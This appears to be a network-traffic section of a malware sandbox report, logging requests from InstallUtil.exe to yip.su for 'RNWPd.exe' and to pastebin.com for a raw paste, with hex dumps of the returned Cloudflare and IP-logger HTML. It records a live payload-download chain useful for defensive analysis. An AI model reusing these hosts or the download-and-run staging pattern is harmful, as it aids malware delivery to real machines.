                            2024-09-10 16:22:10 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:22:10 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:22:10 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:22:10 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:22:10 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.1149738188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:22:10 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:22:10 UTC898INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:22:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:22:10 +0000
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Tue, 10 Sep 2024 16:22:10 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7kinZFpMHSZj5HDpEW8b07OmITG9fU7Ea2yo9JSMONWCywd6YWv4%2FeGOIhHMYeUG6pwf13ZX9uEIK3E6XOpDHmLKvvObAba0wNeE7%2BfKYJsucmU0RgFjGFE%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c15c69024345-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:22:10 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:22:10 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                            Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                            2024-09-10 16:22:10 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                            Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                            2024-09-10 16:22:10 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                            Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                            2024-09-10 16:22:10 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                            Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                            2024-09-10 16:22:10 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                            Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                            2024-09-10 16:22:10 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:22:10 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.1149739104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:22:15 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:22:15 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:22:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c17c7c690f6c-EWR
                            2024-09-10 16:22:15 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:22:15 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:22:15 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:22:15 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.1149740188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:22:16 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:22:16 UTC900INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:22:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:22:16 +0000
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Tue, 10 Sep 2024 16:22:16 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIOHuK5Rxmj%2FZ6SpBsTDhAwgUYb7%2BxoF4VSwkkKhJgcE3UOEGOu858QPt5EvAfmCPdK61vh1%2Bgk2kbyMf4bgWr4nLizpxZ1u7I9V64VtNYH415pwbpnAJKE%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c1807f3f1799-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:22:16 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:22:16 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                            Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                            2024-09-10 16:22:16 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
